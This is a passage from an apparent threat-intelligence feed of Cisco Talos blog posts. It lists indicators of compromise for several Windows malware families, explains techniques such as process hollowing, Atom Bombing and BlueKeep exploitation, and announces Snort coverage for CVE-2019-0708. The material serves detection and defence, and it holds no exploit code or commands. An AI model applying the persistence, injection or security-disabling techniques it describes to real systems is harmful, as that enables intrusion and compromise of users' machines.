\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Start Windows ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINLOGIN_INFO ` | 32 \n`<HKLM>\\SECURITY\\RXACT \nValue Name: Log ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINLOGIN_INFO \nValue Name: pool_user ` | 32 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`94[.]100[.]186[.]119` | 32 \n`217[.]69[.]128[.]99` | 32 \n`88[.]99[.]142[.]163` | 14 \n`136[.]243[.]102[.]167` | 12 \n`94[.]130[.]143[.]162` | 11 \n`136[.]243[.]102[.]154` | 10 \n`78[.]46[.]49[.]212` | 6 \n`94[.]130[.]9[.]194` | 6 \n`136[.]243[.]88[.]145` | 6 \n`136[.]243[.]94[.]27` | 6 \n`94[.]130[.]64[.]225` | 5 \n`136[.]243[.]102[.]157` | 5 \n`46[.]4[.]119[.]208` | 5 \n`176[.]9[.]147[.]178` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`xmr[.]pool[.]minergate[.]com` | 32 \n`cloclo11[.]datacloudmail[.]ru` | 32 \n`cloclo16[.]datacloudmail[.]ru` | 32 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Lopatka\\app.exe` | 32 \n`%APPDATA%\\Lopatka\\config.json` | 32 \n`%APPDATA%\\Lopatka` | 32 \n`%System32%\\config\\SECURITY` | 6 \n`%System32%\\config\\SECURITY.LOG1` | 6 \n \n#### File Hashes\n\n` 0137fc231e2d7e412a4e4ebbb670e732e47264034f9ec2493ecbd8000c2eb499 02ab00e9a675adb7b0fb711ba04f29abffe9774d9a79a12cde4041dd1ec81b0d 07ae413be994ec96a7d3e8202cf8917b8635bde5e3f4176dcd218d6cd713db72 088b3da558e94be8b010002638a54ad34edcc5e2557cad98ab0adbfff7ee887b 0bec1af49840202e3f08ee153839630bc15ca00be3c59947d3f34de189b33e43 0c44e2c58e9940b3fc9f2266fcf797e574a24dcf109e136703c37f6b3d0831e5 0c5ea4b44180db65a8833e4808abd600f4ddd2f1f637adf7f89c131aa0cfecff 0cee3e0769dd885c12ac6a214a85275a59bd98937e72e3d03847cfb6f257bd56 0f2b46d1ef3003c93ebddeb87f66e2fe64e338ed36ec868710367e112c36e495 1182ef3ba1044b9341ece945425ed1274e085f374fbbc48917a069de87e53fcc 11e9f442c1f1542f820ffbf23872bafbcfc8fdd2571ac29db34725cee402f3ef 128b0e52a319a8176898acb8561831a6287719202ad4f94dc94fd100ac582335 13b5035f6c4dbcd1a00b2868db39f95cae92b67457e07a208e5eb881d647d132 1839a13f2080086beefa122c5d855580d74059c5d6aba3e1c9759c1e851d092c 184ad59d217ed9d9564436c2f547dfda36250aebf2c29c1350263e506a241aec 1a4426dba7c2baffb9f678acd282e836c8701e497814f95d0c3fe8282e7f0235 1a8c8b017edebaf6f249bda6e91daaecb2b1e2dcbf37b72d5b23bad128fedd3a 1bf6eb53191201bbb8e6281fa417178e1a789f8435b30cf7366cf6bd8fdc3c43 20580370ad7f348ca8709df2da855bdfa2c779a25165b44ced3da6fc70c22d41 21198bdc5acdabc431021f78c6e983e56437b84287e1473431033bc86ba2dca1 2198063b30b7d7195fb574d56571c4f2a699100e34e7d731966fb6c9fc5e90a2 219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172 2573687a28ed782e1df1d2473801c02880a893ef4ee3b2f9664740391818bdee 2d9eec16b891d142303841369dc5b353c2842f3bb623eeee706c7bb316d2bd04 37444d1e21872ad1aca34d764d217dd8ef53c2e199d9c90e296a13535cf06d51 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-wHxGMl82vpI/XWA9ge1wWAI/AAAAAAAACYg/d9ulvR5fNq0ipy18p56oJl584foA0HZ1QCLcBGAs/s1600/219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/--YGiHY59Ifc/XWA9k0UxRNI/AAAAAAAACYo/vXqcHjZeFX4mep3g1ZueT2SnE8MkUtg-ACLcBGAs/s1600/f6eec67e590b38b34c16c170167776604d334d762fffe96d1fdbe938278a5537_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Elkern-7118026-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\HP710C ` | 32 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\Temp\\AIM Account Stealer Downloader.exe` | 32 \n`%SystemRoot%\\Temp\\AikaQuest3Hentai FullDownloader.exe` | 32 \n`%SystemRoot%\\Temp\\Battle.net key generator (WORKS!!).exe` | 32 \n`%SystemRoot%\\Temp\\Borland Delphi 6 Key Generator.exe` | 32 \n`%SystemRoot%\\Temp\\Britney spears nude.exe` | 32 \n`%SystemRoot%\\Temp\\CKY3 - Bam Margera World Industries Alien Workshop Full Downloader.exe` | 32 \n`%SystemRoot%\\Temp\\Cat Attacks Child Full Downloader.exe` | 32 \n`%SystemRoot%\\Temp\\DSL Modem Uncapper.exe` | 32 \n`%SystemRoot%\\Temp\\DivX.exe` | 32 \n`%SystemRoot%\\Temp\\GTA3 crack.exe` | 32 \n`%SystemRoot%\\Temp\\Gladiator FullDownloader.exe` | 32 \n`%SystemRoot%\\Temp\\Grand theft auto 3 CD1 crack.exe` | 32 \n`%SystemRoot%\\Temp\\Hack into any computer!!.exe` | 32 \n`%SystemRoot%\\Temp\\Hacking Tool Collection.exe` | 32 \n`%SystemRoot%\\Temp\\Half-life ONLINE key generator.exe` | 32 \n`%SystemRoot%\\Temp\\Half-life WON key generator.exe` | 32 \n`%SystemRoot%\\Temp\\How To Hack Websites.exe` | 32 \n`%SystemRoot%\\Temp\\Internet and Computer Speed Booster.exe` | 32 \n`%SystemRoot%\\Temp\\Jenna Jameson - Built For Speed Downloader.exe` | 32 \n`%SystemRoot%\\Temp\\KaZaA media desktop v2.0 UNOFFICIAL.exe` | 32 \n`%SystemRoot%\\Temp\\Key generator for all windows XP versions.exe` | 32 \n`%SystemRoot%\\Temp\\LordOfTheRings-FullDownloader.exe` | 32 \n`%SystemRoot%\\Temp\\MSN Password Hacker and Stealer.exe` | 32 \n`%SystemRoot%\\Temp\\Macromedia Flash 5.0 Full Downloader.exe` | 32 \n`%SystemRoot%\\Temp\\Macromedia key generator (all products).exe` | 32 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a 278cad9a78dbad1143db49335eb14979ea4d0ee92c57d2ee2d609174e64a9410 3de7e6becb18bcbc7b296570bedcde5298573aa173ab5b171e074837388e9009 4130a0b119e9ec6d19778832e4c46735be0dd0db1416804c3e812955422eb7aa 41e91ae33451c66142cd5a9a311eaf486a3120e6e5791b092ba0d6c5369488b5 44a2fe971055187936edd220bfd39b53d4a861f87dc26f571919b84ab97ee082 47e52b8ac3c6ff8f2dca34ad0956546c2bf6fa0402b284f2abcf68518a231c6c 4daf6f6578dd52f8622126e6aa602a34126971b27f8b3057fca64af77dcee47d 4ef1228ae3c74f4302f6e6310a76d2a927dcd3df449f0fd507447a0aba24f6e6 51c932a3be3232c21ad7c85b3a42bd69ac8c94b871d2d5ce71b5c7975c74bebb 53beca3b6a9f89775a63e5ac5cfc9bf19ec4ae0ef7610083c1d695fdcc1d3ccc 5ef82482de74c3c76c6ae5e84ed81a90467f2c893e9bdfbe15e0288629ed4bba 6074a512cdd562abd6b565d3d52b0623b699d1ae395fc5b636f287451d4b7d9b 60799126289b3b6cb6cc72c24c3dbfc047646915444ebe11c47be9153ae010a1 6a1421414241c9055b19ed82ff7017b867ec30d7dd958187d1c43470878b964c 6b7a03e862e6c5cf1a14ca0266fd6ab0dbc1919e7d3e8359929f48de3284bb57 6fbf4d256e79f5a00166750204384a7c0dbec8e506ed70e133f9661844563318 7dbcdde4d690e346735b7e282ae64e6f3c82ecf292aec7cf5936e1364d850293 7dc3a586bf6d1addc417169f1522f227cc546d49b3ff722bae8589380962a0fa 82855b7292f0db3a431b4aedf1b03ea39b043082ac31254bdc8201b4a597cf9b 8722a40d49f8dc67c85d9bf38e6a0c09f87141b1f1432a265e3bb465323ec196 890c5dd6a7ba3d245633fc9cc0ddc3710c4fbfbc2272889556b99e8e80fdf63d 9a5ae6f06d4db89fcb05f0aa434cabf8ca40c61523896a97ace25e86986bdcce 9e7a30c7ced797c5e329022a1557e2164bf790420ce08320c0b20cdc78937ad6 9e97a9bfb0e8e9b082f3c79146e3f34e2098de7404af807f6d90a62d48ff7e2e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-8i-yrtHaOSs/XWA92jEbT4I/AAAAAAAACYw/lQOGQ0bANok97_nsKjcnrpJIxg7nZQOZQCLcBGAs/s1600/0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/--YgDFCIKDx8/XWA97oao53I/AAAAAAAACY4/9O5HZpZQNhcZ1-vGI5ymYj6l5QZghi0CACLcBGAs/s1600/0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Xcnfe-7131484-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 26 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 22 \nMutexes | Occurrences \n---|--- \n`mxPWjmqQ8n` | 1 \n`tx0w71lvCy` | 1 \n`6exxyHtr5d` | 1 \n`G2HYsj3fFg` | 1 \n`JerlUkOuKL` | 1 \n`MiIl5jaHeB` | 1 \n`OaqotdMe7M` | 1 \n`SCmfJWJkxg` | 1 \n`UzS0XAm1fS` | 1 \n`dG6tI9ut6B` | 1 \n`3t5z9ncR4g` | 1 \n`Fnbk52Waor` | 1 \n`R6AEP2O20C` | 1 \n`UAZKOAGGs2` | 1 \n`k9oOrGi0aX` | 1 \n`l5nsV9SyRF` | 1 \n`pyka6wxPfy` | 1 \n`xmZSk4nyco` | 1 \n`ATgpy0BqxR` | 1 \n`NnWRFLviWv` | 1 \n`Qjy3zaZyv9` | 1 \n`agtFwXTy1f` | 1 \n`jReSCvTbxM` | 1 \n`jxvaMsSvTQ` | 1 \n`myY0J7QVPE` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]78` | 25 \n`104[.]20[.]208[.]21` | 14 \n`104[.]20[.]209[.]21` | 12 \n`172[.]217[.]6[.]206` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 26 \n`www[.]ga1n8pm45j[.]com` | 1 \n`www[.]htoc9fu6lz[.]com` | 1 \n`www[.]d5spcpq7ma[.]com` | 1 \n`www[.]x9imtredft[.]com` | 1 \n`www[.]cv4ygugpgj[.]com` | 1 \n`www[.]gnzs22h5ae[.]com` | 1 \n`www[.]ctabhfeith[.]com` | 1 \n`www[.]1ditgmvebu[.]com` | 1 \n`www[.]fhgbysko8w[.]com` | 1 \n`www[.]svu9es1kaz[.]com` | 1 \n`www[.]mbke6vrdrw[.]com` | 1 \n`www[.]y428zntdqc[.]com` | 1 \n`www[.]pb1ymjotdh[.]com` | 1 \n`www[.]fvi6gtygop[.]com` | 1 \n`www[.]nacci0plbn[.]com` | 1 \n`www[.]tfbjnm8ss8[.]com` | 1 \n`www[.]bf3ktyulcd[.]com` | 1 \n`www[.]7hcgj1c7yi[.]com` | 1 \n`www[.]vgdxer8o9b[.]com` | 1 \n`www[.]efk8v7cwgz[.]com` | 1 \n`www[.]b2oes11vip[.]com` | 1 \n`www[.]kxzgxtsgzo[.]com` | 1 \n`www[.]bqwdgq9z5o[.]com` | 1 \n`www[.]9ryvqouwz2[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`<malware cwd>\\old_<malware exe name>` | 26 \n \n#### File Hashes\n\n` 03ab0d4316dba014132279a8fa00672dd72dc52010eca751cca0ceeffee2a940 08728191591ac79aca64917792a74cba2c615487efd3a1194c9bcb774c7a2bbe 0e150456f2a44be79d12adc971076182752864d5c975135609dde6396edf8f92 1650c30e8c7a2441fddc5ae39022d063787d6e9bf31136e7b7a4da058d0e127b 16a955f71500c4b96bb4f3477f295b1e03891e37ed3f15814f3e10e986b41891 2baea5f5924c3797df0292430d7c221c29affc31ac9e892cddce75318cbd4050 38f55600b63cf4b1dead874bb77508dbb367289d4ed39bfa501f38ce6864c561 4529b2919ba158197448b5a407f6399a7ad659aa4b6bfe84a0a69012251957d6 455dda508bbc9bb449541a164536c6ff349036138ace35ecd8b41f328d124868 49328a8570131578e7db5efb056fdfe0918da3022207f6f11fce28cc3ada0dd4 502394f8fd57179a0d32c6c16ec67553841ceb2d2502287ad72b24cf3bbcb940 66c52a00e0bbfc2521431b1093459445abfc410ab365fe18eaa6be4d39b290e5 6a428aa727871fd11bbe5c47c28133042711634b984640e9e61d07281349ebe1 7dc0103c383cbb391561b17c1b5519ff6d742f157d24780b8b89802bf8aeaca8 8b9ffb6981205ab934f0b0014157853099952feb642733dfaf22a36915eaf9e2 8dccacaa54c3735a10c22b876351b6503f5bbc5dec99acd0ac45f72302ea0cc1 8e31d779fb1b41faea824379012dc111909efd6ba6fd22fc3792c42d0d750c30 91a6ff4ea2c0dcefc1afc65a73b0354ebca82938abf16be2fdf5d0260c6a9fae 989193f39f3e95b4451cfd992692dd0e4ae06dd53cbddaacc4cde0e647b6cd26 992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3 a24985a6f7bff0429bfabf4b0a42f222c152b40669459c068774674c3d156038 adf49cd22dae9ee319da7f8dc03b24eac649f982048b5542f9b377f7beeeb1ac b1a5a9e9ddaec143aae51d0440d040ba98010724046c3a2b97e754d9784aa252 b492b4bbdc6a0661f22678cd3b80430279c29bd0eadbd947c1f44794dc56e99d c10735796a4e90c0266e5c127a0b9ae3361a966c0bc5f1460fb9f3db66a3c519 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-2jIYBgLW7EY/XWA-ITLJ_5I/AAAAAAAACZA/QE0gdMqY9jQPJ8YKTgg6uTT7eysdxTQpACLcBGAs/s1600/992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ENhb1cCK_zY/XWA-LAIpVQI/AAAAAAAACZE/jjibVriO3l0vIx46itDkJUo5_ihgtqRrQCLcBGAs/s1600/992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7123957-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\TOOLBAR \nValue Name: Locked ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU \nValue Name: NoAutoUpdate ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fxrab ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: saoavir ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kiupouv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: liupiuh ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juvil ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xeaoro ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: loxem ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qetap ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kauuyom ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jaoguo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: reugo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: meerad ` | 1 \nMutexes | Occurrences \n---|--- \n`\\BaseNamedObjects\\A` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 11 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]timedate3[.]com` | 11 \n`ns1[.]timedate1[.]com` | 11 \n`ns1[.]timedate1[.]net` | 11 \n`ns1[.]timedate3[.]net` | 11 \n`ns1[.]timedate2[.]com` | 11 \n`ns1[.]timedate3[.]org` | 11 \n`ns1[.]timedate1[.]org` | 11 \n`ns1[.]timedate2[.]org` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 12 \n`\\System Volume Information.exe` | 12 \n`\\$RECYCLE.BIN.exe` | 12 \n`\\Secret.exe` | 12 \n`\\Passwords.exe` | 12 \n`\\Porn.exe` | 12 \n`\\Sexy.exe` | 12 \n`E:\\autorun.inf` | 12 \n`E:\\$RECYCLE.BIN.exe` | 12 \n`E:\\Passwords.exe` | 12 \n`E:\\Porn.exe` | 12 \n`E:\\Secret.exe` | 12 \n`E:\\Sexy.exe` | 12 \n`E:\\System Volume Information.exe` | 12 \n`E:\\x.mpeg` | 12 \n`%HOMEPATH%\\Passwords.exe` | 12 \n`%HOMEPATH%\\Porn.exe` | 12 \n`%HOMEPATH%\\Secret.exe` | 12 \n`%HOMEPATH%\\Sexy.exe` | 12 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`%HOMEPATH%\\<random, matching '[a-z]{5,7}'>.exe` | 12 \n`%HOMEPATH%\\RCX<random, matching '[A-F0-9]{3,4}'>.tmp` | 9 \n \n#### File Hashes\n\n` 0426c4c36a4793fcbd52f68d1c31620ed0500bc9999c8cae4be03cd7307299d8 7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c e0d2b56017c438c095800e361ccd7dc27991d0414ce90c0ba9e841220a7c4cc4 e30608735f6e814e40dfd878d4ef1f236660e6ebb4541d6496509493aec5058b f0cf9a4022dbd84685941b3043fd899c4411f9109ea1a09188190705deab8793 f7808bd853e4d50ea09aa31fe8f4c2593391e73f4e73e94a737ae9a074d04abb fca71f3c3fbf6bde78320761bef612e2d7ab278b86e8ae63a70a55708f9600fa fd225f346b89b87ed234350ee6aa8ee61816865b67369d45ac17b8aaf9bacbba fd283c48a116a0f724d0817ae861deb561da5c8890f82dbf1241e9e692730ad6 fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed fe7a44bb5409772b8386a585c6bdfce47fa978d29cf0203eb9d547490daa776c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lpz26TFk6Hc/XWA-aW8ghBI/AAAAAAAACZQ/IUI0INRqZDooc8QoesMzgEyMzZfAlcGNACLcBGAs/s1600/cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-M0MRfrZa3ao/XWA-u0s4YcI/AAAAAAAACZg/TXdrAUrwiIQ1TvDieeajEHwvj-ImesSSwCLcBGAs/s1600/7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-qIkly23-24A/XWA-pf1uocI/AAAAAAAACZY/1rDIsJ2nO5wWLQIkcn3Gm3xTi_Cjk9dpQCLcBGAs/s1600/fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nMadshi injection detected \\- (1156) \n--- \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nCVE-2019-0708 detected \\- (1075) \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nKovter injection detected \\- (580) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (526) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (244) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (214) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (53) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (34) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nAtom Bombing code injection technique detected \\- (25) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nPowerShell file-less infection detected \\- (15) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \n \n", "cvss3": {}, "published": "2019-08-23T13:21:07", "type": "talosblog", "title": "Threat Roundup for August 16 to August 23", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-08-23T13:21:07", "id": "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2sq8-uD9dcM/threat-roundup-0816-0823.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T16:23:20", "description": "Last night, Cisco Talos released the latest [SNORT\u00ae rule update](<https://snort.org/advisories/talos-rules-2019-05-20>), which includes coverage for the critical Microsoft vulnerability CVE-2019-0708. \n \nThe company disclosed this vulnerability last week as part of its [monthly security update](<https://blog.talosintelligence.com/2019/05/MS-Patch-Tuesday-May-2019.html>). This particular bug exists in Remote Desktop Services \u2014 formerly known as Terminal Services. \n \nThe vulnerability requires no user interaction and is pre-authentication. Microsoft specifically warned against this bug because it is \"wormable,\" meaning future malware that exploits this vulnerability could spread from system to system. One of the most infamous examples of a worm was the [WannaCry malware](<https://blog.talosintelligence.com/2017/05/wannacry.html>), which disabled major services across the globe in May 2017. An attacker could exploit this vulnerability by sending a specially crafted request to the target system's Remote Desktop Service via RDP. \n \nSnort rule 50137 covers indicators associated with this vulnerability. You can learn more about this release at the Snort blog [here](<https://blog.snort.org/2019/05/snort-rule-update-for-may-20-2019.html>).\n\n", "cvss3": {}, "published": "2019-05-21T14:25:43", "type": "talosblog", "title": "Talos releases coverage for 'wormable' Microsoft vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-05-21T14:25:43", "id": "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/EPiqmeriWpY/talos-releases-coverage-for-wormable.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-10T23:26:13", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 3 and Jan. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Razy-7505643-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Dropper.Tofsee-7492214-1 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet. \nWin.Packed.Ursnif-7489213-0 | Packed | Ursnif is used to steal 